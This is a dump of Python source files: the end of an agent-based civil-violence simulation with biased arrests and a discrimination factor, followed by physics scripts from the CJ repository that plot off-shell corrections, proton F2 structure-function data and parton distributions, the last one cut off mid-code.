Grievance, see paper\n self.R = np.random.uniform(0, 1) # Risk aversion\n self.J = 0 # Remaining jail time, 0 if free\n self.P = 0 # Estimated arrest probability\n self.N = self.R * self.P * self.Jmax # Agent's net risk\n self.D = 0 #Percieved discrimination\n self.Il = 1-L\n\n def move(self):\n # Moves the agent if the agent is not in jail\n shift = np.random.randint(-self.vision_agent, self.vision_agent+1, (2))\n if self.status == 2: # Check for status\n shift = np.array([0, 0])\n self.position = self.position + shift # Move\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not leave the matrix\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not leave the matrix\n # locations_agents_dic[self.nr] = self.position\n\n def update_status(self, arrest=False):\n # Updates the agent's status\n if self.status == 2 and self.J > 0:\n # If in Jail, Jail time reduces by 1\n self.J = self.J - 1\n\n elif self.status == 2 and self.J == 0:\n # Exits Jail and is now active\n self.status = 1\n elif arrest:\n # Is arrested and assigned a Jail time, see paper\n self.status = 2\n self.J = np.random.randint(1, Jmax)\n elif self.G - (self.N-D_const[self.type]*self.D) > T:\n # Get's active, see paper\n self.status = 1\n else:\n # Keep quite\n self.status = 0\n\n def active_near_agents(self, agents):\n # Computes number of near active agents\n near_agents = 0\n for agent in agents:\n if agent.status == 1:\n # Only active agents\n pos = agent.position\n if np.linalg.norm(self.position - pos, ord=np.inf) < self.vision_agent:\n # If within vision, count\n near_agents += 1\n if not self.status == 1:\n # To avoid double counting but always count the agent self, see paper\n near_agents += 1\n return near_agents\n def compute_arrested_ratio(self,agents,radius):\n #compute the ratio type_1 arrested agents over total arrests\n tot_arrested = 0\n type_1_arrested = 0\n for agent in agents:\n pos = agent.position\n if (np.linalg.norm(self.position - pos, ord=np.inf)<radius) and (agent.status == 2):\n tot_arrested = tot_arrested + 1\n if agent.type == 1:\n type_1_arrested = type_1_arrested + 1\n if tot_arrested == 0:\n ratio = 0.5\n else:\n ratio = type_1_arrested/tot_arrested\n return ratio\n\n def near_cops(self, cops):\n # Counts cops within vision\n near_cops = 0\n for cop in cops:\n pos = cop.position\n if np.linalg.norm(self.position - pos, ord=np.inf) < self.vision_agent:\n # If within vision count\n near_cops += 1\n return near_cops\n\n def updateP(self, agents, cops):\n # Updates estimated arrest probability, see paper\n active_agents_near = self.active_near_agents(agents)\n cops_near = self.near_cops(cops)\n self.P = 1 - np.exp(-k * cops_near / active_agents_near)\n\n def percieved_agressivity_of_cops(self, cops):\n # Sums over cops agressivity within influence radius\n percieved_agressivity = 0\n for cop in cops:\n pos = cop.position\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_cop:\n # If within vision count\n percieved_agressivity += cop.agressivity\n return percieved_agressivity\n\n def updateIl(self, cops):\n self.Il=self.Il*np.exp(self.percieved_agressivity_of_cops(cops))\n\n def updateN(self):\n # Update net risk, see paper\n self.N = self.R * self.P * self.Jmax\n\n def updateG(self):\n # Update net risk, see paper\n self.G = self.Il*self.H\n\n def updateD(self,agents):\n #update the discrimination factor D\n radius = 40 #set the radius smaller to let D more local, let it to 40 to keep D global\n ratio = self.compute_arrested_ratio(agents,radius)\n self.D = abs(0.5-ratio)\n\n def time_step(self, agent, cops):\n # Comptes one time iteration for the given agent\n self.move()\n self.updateP(agent, cops)\n self.updateN()\n self.updateIl(cops)\n self.updateG()\n self.updateD(agent)\n self.update_status(arrest=False)\n return self\n\n\nclass cop():\n def __init__(self, nr):\n self.nr = nr # Identifier\n self.vision_cop = vision_cop\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns randomly initial position\n self.agressivity = random.choices([1, -0.1],[percentage_bad_cops, 1-percentage_bad_cops])[0]\n\n def move(self):\n # Moves the cop within vision\n shift = np.random.randint(-self.vision_cop, self.vision_cop+1, (2))\n self.position = self.position + shift\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not exit matrix\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not exit matrix\n\n def update_agent_status(self, agents):\n # Arrests randomly (with bias based on type) an agent within vision\n near_active_agents_0 = [] # List type 0 agents within vision\n near_active_agents_1 = [] # List type 1 agents within vision\n for agent in agents:\n pos = agent.position\n if np.linalg.norm(self.position - pos, ord=np.inf) < self.vision_cop:\n if agent.status == 1:\n if agent.type == 0:\n near_active_agents_0.append(agent)\n else:\n near_active_agents_1.append(agent)\n if len(near_active_agents_0) > 0:\n if len(near_active_agents_1) > 0:\n # Both types in vision, compute now which type to arrest\n choice01 = np.random.choice(2, 1, p=[1 - prob_arrest_class_1, prob_arrest_class_1])[0]\n if choice01 == 0:\n # Arrest randomly in type 0\n random.choice(near_active_agents_0).update_status(arrest=True)\n else:\n # Arrest randomly in type 1\n random.choice(near_active_agents_1).update_status(arrest=True)\n else:\n # No type 1 but type 0 in vision, arrest randomly type 0\n random.choice(near_active_agents_0).update_status(arrest=True)\n elif len(near_active_agents_1) > 0:\n # No type 0 vut type 1 in vision, arrest randomly type 1\n random.choice(near_active_agents_1).update_status(arrest=True)\n\n # No one in vision, no arrest\n\n def time_step(self, agents):\n # Compute one time iteration for cops\n self.move()\n self.update_agent_status(agents) # Do arrest if possible\n return self\n\n\n# ============================================\n# Simulation data --> Do the tuning here\n# ============================================\nn_agents = int(0.7*nation_dimension**2) # Number of considerate agents\nn_cops = int(0.04*nation_dimension**2) # Number of considerate cops\ntfin = 200 # Final time, i.e. number of time steps to consider\nagents = [agent(n, L, Jmax, p_class_1) for n in range(n_agents)] # Generate the agents\ncops = [cop(n) for n in range(n_cops)] # Generate the cops\n\nsave = True # Set to True if want to save the data\ninteractive = True # If true computes the html slider stuff\nshow_plot = True\n\n# ============================================\n# Simulation computation\n# ============================================\n\nnow = datetime.now() # Gets date and time info\ndt_string = now.strftime(\"%d_%m_%Y_%H_%M\")\nname_to_save = 'simulation_' + dt_string # All will be save with this name + counter + extensions\nif save:\n if not os.path.isdir(name_to_save):\n # If save and directory does not exists, create one\n os.mkdir(name_to_save)\nname_to_save = name_to_save + '/' + name_to_save\n\npositions_data = np.empty([tfin, nation_dimension, nation_dimension]) # Stores positional and type data\n\ncolor_name_list = [\"white\", \"green\", \"red\", \"darkorange\", \"lime\", \"fuchsia\", \"goldenrod\", \"blue\"]\n\ntime =range(tfin)\nD_list = [0]*len(range(tfin))\narrested_list = [0]*len(range(tfin))\ntype_1_arrested_list = [0]*len(range(tfin))\ntype_0_arrested_list = [0]*len(range(tfin))\nactive_list = [0]*len(range(tfin))\ntype_1_active_list = [0]*len(range(tfin))\ntype_0_active_list = [0]*len(range(tfin))\nfor t in trange(tfin):\n arrested = 0\n type_1_arrested = 0\n type_0_arrested = 0\n active = 0\n type_1_active = 0\n type_0_active = 0\n D = 0\n # Does the t-th time iteration\n positions = np.zeros((nation_dimension, nation_dimension)) - 1 # Initialisation of the matrix\n # Values of positions are:\n # * -1: no one here\n # * 0: quite agent type 0 here\n # * 1: active agent type 0 here\n # * 2: agent in jail type 0 here\n # * 3: quite agent type 1 here\n # * 4: active agent type 1 here\n # * 5: agent in jail type 1 here\n # * 6: cop here\n for agent in agents:\n pos = agent.position\n positions[pos[0], pos[1]] = agent.status + 3*agent.type # Updates matrix data with agents position and status\n if agent.status == 2:\n arrested = arrested+1\n if agent.type == 1:\n type_1_arrested = type_1_arrested + 1\n else:\n type_0_arrested = type_0_arrested + 1\n elif agent.status ==1:\n active = active +1\n if agent.type == 1:\n type_1_active =type_1_active+1\n else:\n type_0_active = type_0_active + 1\n\n D = agent.D\n for cop in cops:\n pos = cop.position\n positions[pos[0], pos[1]] = 6 # Updates matrix data with cops position\n positions_data[t, :, :] = positions # Stores the data of the positons\n im = plt.imshow(positions, cmap=mpl.colors.ListedColormap(color_name_list))\n values = [-1, 0, 1, 2, 3, 4, 5, 6]\n colors = [im.cmap(im.norm(value)) for value in values]\n patches = [mpatches.Patch(color=colors[i], label=\"Level {l}\".format(l=values[i])) for i in range(len(values))]\n plt.legend(handles=patches, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n if show_plot:\n plt.show()\n # Plots the positions matrix\n if save:\n plt.savefig(name_to_save + '_time_iter_nr' + str(t) + '.png')\n # Saves the positions matrix\n # Compute now one time steps for each cop and each agent\n cops = [cop.time_step(agents) for cop in cops]\n agents = [ag.time_step(agents, cops) for ag in agents]\n D_list[t] = D\n arrested_list[t] = arrested\n type_1_arrested_list[t] = type_1_arrested\n type_0_arrested_list[t] = type_0_arrested\n active_list[t] = active\n type_1_active_list[t] = type_1_active\n type_0_active_list[t] = type_0_active\n\nif interactive:\n\n # Create figure\n fig = go.Figure()\n # Add traces, one for each slider step\n for step in np.arange(0, tfin, 1):\n curent_pd = pd.DataFrame(positions_data[step, :, :])\n fig.add_trace(go.Heatmap(\n z=curent_pd.applymap(str),\n colorscale=color_name_list)\n )\n # Make First trace visible\n fig.data[0].visible = True\n # Create and add slider\n steps = []\n\n for i in range(len(fig.data)):\n step = dict(\n method=\"update\",\n args=[{\"visible\": [False] * len(fig.data)},\n {\"title\": \"Slider switched to step: \" + str(i)}], # layout attribute\n )\n step[\"args\"][0][\"visible\"][i] = True # Toggle i'th trace to \"visible\"\n steps.append(step)\n\n sliders = [dict(\n active=10,\n currentvalue={\"prefix\": \"Time step: \"},\n pad={\"t\": 50},\n steps=steps\n )]\n\n fig.update_layout(sliders=sliders)\n fig.show()\n if save:\n fig.write_html(name_to_save+'.html')\n\nif save:\n lines = ['nation_dimension' + ': ' + str(nation_dimension),\n 'p_class_1' + ': ' + str(p_class_1),\n 'vision_agent' + ': ' + str(vision_agent),\n 'vision_cop' + ': ' + str(vision_cop),\n 'L' + ': ' + str(L),\n 'T' + ': ' + str(T),\n 'Jmax' + ': ' + str(Jmax),\n 'factor_Jmax1' + ': ' + str(factor_Jmax1),\n 'k' + ': ' + str(k),\n 'prob_arrest_class_1' + ': ' + str(prob_arrest_class_1),\n 'n_agents' + ': ' + str(n_agents),\n 'n_cops' + ': ' + str(n_cops),\n 'tfin' + ': ' + str(tfin)]\n\n with open(name_to_save + '_par.txt', 'w') as file:\n for line in lines:\n file.write(line + '\\n')\n file.close()\n # plot graphics for type0/1 active/arrested and D\n fig, ax = plt.subplots()\n ax.plot(time, D_list)\n ax.set(xlabel='time (epochs)', ylabel=\"agent's percieved D\", title='Discrimination factor')\n ax.grid()\n ax.legend(['D factor'])\n fig.savefig(name_to_save + 'Discrimination.png')\n\n fig, ax = plt.subplots()\n ax.plot(time, arrested_list, label='Total number of arrested agents')\n ax.plot(time, type_1_arrested_list, label='Total number of type 1 arrested agents')\n ax.plot(time, type_0_arrested_list, label='Total number of type 0 arrested agents')\n ax.set(xlabel='time (epochs)', ylabel=\"number of agents\", title='Arrested agents')\n ax.grid()\n ax.legend(['total arrested','type 1 arrested', 'type 0 arrested'])\n fig.savefig(name_to_save + 'Arrests.png')\n\n fig, ax = plt.subplots()\n ax.plot(time, active_list, label='Total number of active agents')\n ax.plot(time, type_1_active_list, label='Total number of type 1 active agents')\n ax.plot(time, type_0_active_list, label='Total number of type 0 active agents')\n ax.set(xlabel='time (epochs)', ylabel=\"number of agents\", title='Active agents')\n ax.grid()\n ax.legend(['total active', 'type 1 active', 'type 0 active'])\n fig.savefig(name_to_save + 'Active.png')\n" } ]
3
Jeff182/CJ
https://github.com/Jeff182/CJ
dd8c2cc3f1a57b0c2f916b45968d0c573995b4ef
30fb4dba93c6812b7470e3f1ad767ad583c3a106
882232bc1c455edf89de3ad08bc65739c8f322ab
refs/heads/master
2020-04-10T16:54:30.236006
2015-09-15T01:00:11
2015-09-15T01:00:11
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48311156034469604, "alphanum_fraction": 0.5742067694664001, "avg_line_length": 27.735294342041016, "blob_id": "2b9931e67eeea564e0354b22b2050c61f4a0e1a8", "content_id": "5b8bde7b5caeb85407b9ed42e87f9c1848da815c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 977, "license_type": "no_license", "max_line_length": 65, "num_lines": 34, "path": "/sharespace/codes/off.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\n\nD={}\nD['AV18'] ={'p':[0.098,0.345,0.048] ,'c':'r','ls':'-'} \nD['CDBonn']={'p':[0.138,0.373,0.058] ,'c':'g','ls':'--'}\nD['WJC1'] ={'p':[0.132,-0.253,0.152],'c':'k','ls':'-.'}\nD['WJC2'] ={'p':[0.076,0.313,0.033] ,'c':'b','ls':':'}\n\nf=lambda x,p:p[0]*(x-p[1])*(x-p[2])*(1+p[1]-x)\nX=np.linspace(0,1,100)\nax=py.subplot(111)\nfor k in ['AV18','CDBonn','WJC1','WJC2']:\n ax.plot(X,f(X,D[k]['p']),\\\n color=D[k]['c'],\\\n lw=2.0,\\\n ls=D[k]['ls'],\\\n label=tex(k)\n )\nax.set_ylim(-0.025,0.04)\nax.set_ylabel(r'$\\delta f^N$',size=25)\nax.set_xlabel('$x$',size=25)\nax.legend(frameon=0,loc=2,fontsize=20)\npy.tick_params(axis='both',labelsize=20)\npy.tight_layout()\npy.savefig('gallery/off_shell.pdf')\n" }, { "alpha_fraction": 0.4637708365917206, "alphanum_fraction": 0.5368844866752625, "avg_line_length": 27.63538932800293, "blob_id": "9aca71019717a48522ce8b61d120034f88ecc6c9", "content_id": "99a15e9776ed74121865725c3f99f8f735cb4633", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10682, "license_type": "no_license", "max_line_length": 86, "num_lines": 373, "path": "/sharespace/codes/other/F2p.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport pandas as pd\nfrom tools import tex\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nimport matplotlib.patches as patches\nimport matplotlib.gridspec as gridspec\nimport lhapdf\n\nclass StructFunc(object):\n\n def __init__(self):\n self.path2exp='../../expdata/'\n self.D={}\n self.get_expdata_fnames()\n self.load_expdata()\n self.split_data()\n #self.get_errors()\n\n def get_expdata_fnames(self):\n D=self.D\n\n D['HERA p']={'fname':'HERA.dat', 'label':'HERA'}\n D['BCDMS p']={'fname':'BcdF2pCor', 'label':'BCDMS'}\n #D['BCDMS d']={'fname':'BcdF2dCor'}\n D['NMC p'] ={'fname':'NmcF2pCor', 'label':'NMC'}\n D['SLAC p'] ={'fname':'slac_p_reb', 'label':'SLAC'}\n #D['SLAC d'] ={'fname':'slac_d_reb'}\n D['JLab p'] ={'fname':'jl00106F2p', 'label':'JLab'}\n #D['JLab d'] ={'fname':'jl00106F2d'}\n ##D['BNS d'] ={'fname':'BNS_F2nd'}\n\n D['HERA p']['color']='g'\n D['BCDMS p']['color']='b'\n #D['BCDMS d']['color']='g'\n D['NMC p']['color'] ='c'\n D['SLAC p']['color'] ='y'\n #D['SLAC d']['color'] ='y'\n D['JLab p']['color'] ='r'\n #D['JLab d']['color'] ='k' \n ##D['BNS d']['color'] ='r' \n\n D['HERA p']['symbol']='*'\n D['BCDMS p']['symbol']='.'\n #D['BCDMS d']['symbol']='s'\n D['NMC p']['symbol'] ='*'\n D['SLAC p']['symbol'] ='>'\n #D['SLAC d']['symbol'] ='<'\n D['JLab p']['symbol'] ='^'\n #D['JLab d']['symbol'] ='v' \n ##D['BNS d']['symbol'] ='*' \n\n # errors\n D['HERA p']['ERR-key']=['STAT+SYST']\n D['BCDMS p']['ERR-key']=['STAERR','SYSERT']\n #D['BCDMS d']['ERR-key']=['STAERR','SYSERT']\n D['NMC p']['ERR-key']=['STAERR','SYSERT']\n D['SLAC p']['ERR-key']=['STAT.','SYS.']\n #D['SLAC d']['ERR-key']=['STAT','SYS']\n D['JLab p']['ERR-key']=['STAT','SYST']\n #D['JLab d']['ERR-key']=['STAT','SYST']\n\n keys=[]\n keys.append('HERA p')\n keys.append('BCDMS p')\n #keys.append('BCDMS d')\n keys.append('NMC p')\n keys.append('SLAC p')\n #keys.append('SLAC d')\n keys.append('JLab p')\n #keys.append('JLab d')\n self.ordered_keys=keys\n\n def load_expdata(self): \n D=self.D\n\n for k in D.keys():\n print 'loading ',k\n\n # open file\n F=open(self.path2exp+D[k]['fname'])\n L=F.readlines()\n F.close()\n L=[l.strip() for l in L]\n L=[l.split() for l in L if l!='']\n\n # construct table\n table=[]\n flag=False\n for i in range(len(L)): \n try:\n l=[float(x) for x in L[i]]\n if flag==False:\n ih=i-1\n flag=True\n except:\n continue\n table.append(l)\n table=np.transpose(table)\n\n # construct headers\n H=[x.upper() for x in L[ih]]\n for i in range(len(H)): H[i]=H[i].replace('Q**2','Q2')\n for i in range(len(H)): H[i]=H[i].replace('Q^2','Q2')\n for i in range(len(H)): H[i]=H[i].replace('F2P','F2')\n for i in range(len(H)): H[i]=H[i].replace('F2D','F2')\n for i in range(len(H)): H[i]=H[i].replace('F2D','F2')\n\n # construct pandas data frame\n d={}\n for i in range(len(H)):\n d[H[i]]=table[i]\n d['W2']=0.9389185**2 + d['Q2']/d['X'] - d['Q2']\n\n ERR=np.zeros(d['W2'].size)\n for kk in D[k]['ERR-key']:\n ERR+=d[kk]**2\n ERR=ERR**0.5\n d['ERR']=ERR\n\n DF=pd.DataFrame(d)\n #DF=DF[DF.W2>4.0]\n DF=DF[DF.Q2>1.0]\n\n # store DF in global dic\n D[k]['DF']=DF\n\n def get_xbins(self):\n xbins=[]\n\n\n xbins.append([3.8e-6,4.5e-6])\n xbins.append([4.9e-6,5.7e-6])\n xbins.append([6.3e-6,7.2e-6])\n xbins.append([7.9e-6,9.0e-6])\n xbins.append([9.5e-6,11.1e-6])\n xbins.append([12e-6,13.9e-6])\n xbins.append([15.2e-6,17.0e-6])\n xbins.append([19e-6,21e-6])\n xbins.append([31e-6,33e-6])\n xbins.append([38e-6,42e-6])\n xbins.append([48e-6,52e-6])\n xbins.append([58e-6,67e-6])\n xbins.append([77e-6,82e-6])\n xbins.append([96e-6,11e-5])\n xbins.append([12.5e-5,13.5e-5])\n xbins.append([19.5e-5,20.5e-5])\n xbins.append([24.5e-5,25.5e-5])\n xbins.append([30.5e-5,32.5e-5])\n xbins.append([47.5e-5,50.5e-5])\n xbins.append([78.5e-5,82.5e-5])\n xbins.append([12.5e-4,13.5e-4])\n xbins.append([19.5e-4,20.5e-4])\n\n xbins.append([3.1e-3,3.8e-3])\n xbins.append([4.8e-3,5.7e-3])\n xbins.append([7.2e-3,9.3e-3])\n xbins.append([1.15e-2,1.4e-2])\n xbins.append([1.65e-2,1.9e-2])\n xbins.append([1.95e-2,2.05e-2])\n xbins.append([2.3e-2,2.9e-2])\n xbins.append([3.15e-2,3.25e-2])\n xbins.append([3.4e-2,3.8e-2])\n xbins.append([4.65e-2,5.4e-2])\n xbins.append([6.5e-2,7.3e-2])\n xbins.append([7.8e-2,8.2e-2])\n xbins.append([8.5e-2,9.2e-2])\n xbins.append([9.8e-2,10.3e-2])\n xbins.append([10.8e-2,11.3e-2])\n xbins.append([12.8e-2,13.2e-2])\n xbins.append([13.6e-2,14.6e-2])\n xbins.append([17.1e-2,18.7e-2])\n xbins.append([19.7e-2,20.7e-2])\n xbins.append([21.7e-2,23.7e-2])\n xbins.append([24.8e-2,25.2e-2])\n xbins.append([26.0e-2,29.0e-2])\n xbins.append([33.0e-2,36.0e-2])\n xbins.append([39.5e-2,40.5e-2])\n xbins.append([42.0e-2,48.0e-2])\n\n #xbins.append([48.1e-2,49.4e-2])\n #xbins.append([49.4e-2,50.8e-2])\n #xbins.append([50.8e-2,51.8e-2])\n #xbins.append([51.8e-2,52.6e-2])\n #xbins.append([52.6e-2,53.4e-2])\n #xbins.append([53.4e-2,53.9e-2])\n #xbins.append([53.9e-2,54.5e-2])\n #xbins.append([54.5e-2,55.6e-2])\n #xbins.append([55.6e-2,56.6e-2])\n #xbins.append([56.6e-2,57.3e-2])\n #xbins.append([53.0e-2,56.0e-2])\n\n xbins.append([48.0e-2,63.0e-2])\n\n xbins.append([63.0e-2,66.0e-2])\n xbins.append([73.0e-2,76.0e-2])\n xbins.append([84.0e-2,86.0e-2])\n return xbins[::-1]\n\n def split_data(self):\n xbins=self.get_xbins()\n D=self.D\n for k in D.keys():\n d=D[k]['DF']\n dbinned={}\n for i in range(len(xbins)):\n xmin,xmax=xbins[i]\n dbinned[i]=d[d.X>xmin]\n dbinned[i]=dbinned[i][dbinned[i].X<xmax]\n D[k]['dbinned']=dbinned\n\n def make_XQ2_plot(self):\n D=self.D\n ax=py.subplot(111)\n for k in self.D.keys():\n d=D[k]['DF']\n if 'HERA' in k: color='k'\n else: color='r'\n ax.plot(d['X'],d['Q2'],color+'.',markersize=3)\n ax.semilogx()\n ax.semilogy()\n xbins=np.array(self.get_xbins()).flatten()\n ax.set_xticks(xbins)\n ax.set_xlim(1e-1,1e-0)\n ax.grid()\n py.savefig('XQ2.pdf')\n\n def add_subplot_axes(self,ax,rect,axisbg='w'):\n fig = py.gcf()\n box = ax.get_position()\n width = box.width\n height = box.height\n inax_position = ax.transAxes.transform(rect[0:2])\n transFigure = fig.transFigure.inverted()\n infig_position = transFigure.transform(inax_position) \n x = infig_position[0]\n y = infig_position[1]\n width *= rect[2]\n height *= rect[3] # <= Typo was here\n subax = fig.add_axes([x,y,width,height],axisbg=axisbg)\n x_labelsize = subax.get_xticklabels()[0].get_size()\n y_labelsize = subax.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2]**0.5\n y_labelsize *= rect[3]**0.5\n subax.xaxis.set_tick_params(labelsize=x_labelsize)\n subax.yaxis.set_tick_params(labelsize=y_labelsize)\n return subax\n \n def make_F2_plot(self):\n D=self.D\n xbins=self.get_xbins()\n py.figure(figsize=(15,15))\n\n gs = gridspec.GridSpec(1,1)\n gs.update(left=0.1,right=0.98,top=0.98,bottom=0.1)\n ax=py.subplot(gs[0,0])\n\n for k in self.ordered_keys:\n dbinned=D[k]['dbinned']\n color=D[k]['color']\n sym=D[k]['symbol']\n flag=False\n for i in range(len(xbins)):\n dbin=dbinned[i]\n if dbin['X'].size!=0:\n if flag==False:\n ax.errorbar(dbin['Q2'],dbin['F2']*2**(i+1)\\\n ,yerr=dbin['ERR'].values\\\n ,fmt=color+sym\\\n ,mec=color\n ,label=tex(D[k]['label']))\n flag=True\n else:\n ax.errorbar(dbin['Q2'],dbin['F2']*2**(i+1)\\\n ,yerr=dbin['ERR'].values\\\n ,fmt=color+sym\\\n ,mec=color)\n\n for i in range(len(xbins)):\n Q2=1\n for k in D.keys():\n dbin=D[k]['dbinned'][i]\n if dbin['X'].size==0:continue\n imax=np.argmax(dbin['Q2'].values)\n if dbin['Q2'].values[imax]>Q2: \n Q2=dbin['Q2'].values[imax]\n F2=dbin['F2'].values[imax]\n\n if any([i==k for k in [10,34,37,39,41,44,49,47,43,35,32,30,28,26,45,46]])!=True:\n\tif i>30:\n text='$x=%0.1e$'%(np.mean([xbins[i][0],xbins[i][1]]))\n\t exp=int(text.split('-')[1].replace('$',''))\n\t text=text.split('e')[0]+'e'\n text=text.replace('e',r'\\times 10^{-%d}'%exp)+'\\ (i=%d)$'%i\n\telif i<16:\n\t text='$x=%0.2f'%(np.mean([xbins[i][0],xbins[i][1]]))+'\\ (i=%d)$'%i\n\telse:\n\t text='$x=%0.3f'%(np.mean([xbins[i][0],xbins[i][1]]))+'\\ (i=%d)$'%i\n\n ax.text(Q2*1.2,F2*2**(i+1),text)\n #ax.text(Q2*1.2,F2*2**(i+1),text+str(i))\n\n ax.legend(frameon=0,fontsize=20,numpoints=1)\n\n ax.set_xlim(8e-5,3e5)\n ax.set_ylim(1e-3,2e13)\n ax.semilogy()\n ax.semilogx()\n ax.set_xticks([1e-1,1,1e1,1e2,1e3,1e4,1e5])\n #ax.set_ylabel(tex('F_2')+'$(x,Q^2)$',size=30)\n ax.set_ylabel('$F_2^p(x,Q^2)\\ * 2^{\\ i}$',size=30)\n ax.set_xlabel('$Q^2$'+tex('\\ (GeV^2)'),size=30)\n py.tick_params(axis='both',labelsize=20)\n\n xsq=0.45\n ysq=0.07\n ax.add_patch(patches.Rectangle((xsq,ysq),0.1,0.15\\\n ,fill=False,transform=ax.transAxes))\n ax.plot([0.36,xsq],[0.07,ysq],'k:'\n ,transform=ax.transAxes)\n ax.plot([0.36,xsq],[0.47,ysq+0.15],'k:'\n ,transform=ax.transAxes)\n\n\n rect1 = [0.06,0.07,0.3,0.3]\n ax1 = self.add_subplot_axes(ax,rect1)\n rect2 = [0.06,0.47,0.3,0.3]\n ax2 = self.add_subplot_axes(ax,rect2)\n\n for k in D.keys():\n if 'JLab' not in k: continue\n d=D[k]['DF']\n color=D[k]['color']\n sym=D[k]['symbol']\n\n ax1.errorbar(d['Q2'],d['F2']\\\n ,yerr=d['ERR'].values\\\n ,fmt=color+sym\\\n ,mec=color)\n\n ax2.errorbar(d['X'],d['F2']\\\n ,yerr=d['ERR'].values\\\n ,fmt=color+sym\\\n ,mec=color)\n\n ax1.locator_params(nbins=5) \n ax2.locator_params(nbins=5) \n\n ax1.tick_params(axis='both',labelsize=12)\n ax2.tick_params(axis='both',labelsize=12)\n\n ax1.set_xlabel(r'$Q^2$'+tex('\\ (GeV^2)'),size=20)\n ax2.set_xlabel(r'$x$',size=20)\n ax1.set_ylim(1e-3,0.25)\n ax2.set_ylim(1e-3,0.25)\n ax1.semilogy()\n ax2.semilogy()\n #py.tight_layout()\n py.savefig('gallery/F2p.pdf')\n\nif __name__=='__main__':\n\n SF=StructFunc()\n #SF.make_XQ2_plot()\n SF.make_F2_plot()\n\n #CJ150=lhapdf.mkPDF('CJ15_NLO',0)\n #print CJ150.xfxQ2(2,0.5,100)\n\n" }, { "alpha_fraction": 0.590133547782898, "alphanum_fraction": 0.6413204669952393, "avg_line_length": 25.431371688842773, "blob_id": "604a152a966b9dc1b5948d078cf2610adbbe5776", "content_id": "44b4b3502edf86b755254bc7bbed8cdbd2f2819c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2696, "license_type": "no_license", "max_line_length": 82, "num_lines": 102, "path": "/sharespace/codes/xpdf.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nfrom master import COMPOSER,FITPACK\n\n# prepare grid \ngs = gridspec.GridSpec(1,2) \ngs.update(left=0.11,right=0.98,wspace=0,hspace=0.0,top=0.98,bottom=0.1)\n\n# construct (L)eft panel\naxL=py.subplot(gs[0,0])\naxL.spines['right'].set_visible(False)\naxL.yaxis.set_ticks_position('left')\naxL.semilogx()\naxL.set_xticks(10**np.linspace(-4,-2,3))\n#axL.set_xlim(1e-5,0.1)\naxL.axvline(0.1,color='k',ls='--',alpha=0.5)\naxL.tick_params(axis='both', which='major', labelsize=20)\n\n# construct (R)ight panel\naxR=py.subplot(gs[0,1])\naxR.spines['left'].set_visible(False)\naxR.axes.yaxis.set_ticklabels([])\naxR.axes.get_yaxis().set_ticks([])\naxR.set_xticks(np.arange(0.1,1.1,0.2))\naxR.set_xlim(0.1,1.0)\naxR.tick_params(axis='both', which='major', labelsize=17)\n\nCJ=COMPOSER(name='CJ15_NLO_KP_AV18')\ndef plot(flav,color,factor=1):\n XL=10**np.linspace(-4,-1,100)\n XR=np.linspace(0.1,1,100)\n L=CJ.get_xpdf(flav,X=XL,Q2=Q2)\n R=CJ.get_xpdf(flav,X=XR,Q2=Q2)\n axL.plot(XL,L['xf0']*factor,color=color,ls='-')\n p1,=axR.plot(XR,R['xf0']*factor,color=color,ls='-',label=flav)\n fill_between(XL,\n factor*(L['xf0']-L['dxf-']*10),\n factor*(L['xf0']+L['dxf+']*10),\n ax=axL,\n facecolor=color,\n edgecolor='none',\n alpha=0.5)\n p2=fill_between(XR,\n factor*(R['xf0']-R['dxf-']*10),\n factor*(R['xf0']+R['dxf+']*10),\n ax=axR,\n facecolor=color,\n edgecolor='none',\n alpha=0.5)#,hatch=None)\n return (p2,p1)\n\nQ2=10\nLH={}\nLH['u']=plot('u','r')\nLH['d']=plot('d','b')\nLH['db+ub']=plot('db+ub','g')\nLH['db-ub']=plot('db-ub','m')\nLH['g']=plot('g','y',factor=1e-1)\n\n# set limits\nylimL = axL.get_ylim()\nylimR = axR.get_ylim()\nymin=-0.1#np.amin([ylimL[0],ylimL[1],ylimR[0],ylimR[1]])\nymax=1.6#np.amax([ylimL[0],ylimL[1],ylimR[0],ylimR[1]])\naxL.set_ylim(ymin,ymax)\naxR.set_ylim(ymin,ymax)\n\n# axis labels\naxL.set_ylabel('$xf(x,Q^2)$',size=25)\naxL.set_xlabel('$x$',size=25)\naxL.xaxis.set_label_coords(1.0,-0.04,transform=axL.transAxes)\n\n# legend\nlabelmap={}\nlabelmap['u']='$u$'\nlabelmap['d']='$d$'\nlabelmap['db+ub']=r'$\\bar{d}+\\bar{u}$'\nlabelmap['db-ub']=r'$\\bar{d}-\\bar{u}$'\nlabelmap['g']='$g/10$'\n\nH,L=[],[]\nfor k in ['u','d','db+ub','db-ub','g']:\n p12=LH[k]\n H.append(LH[k])\n 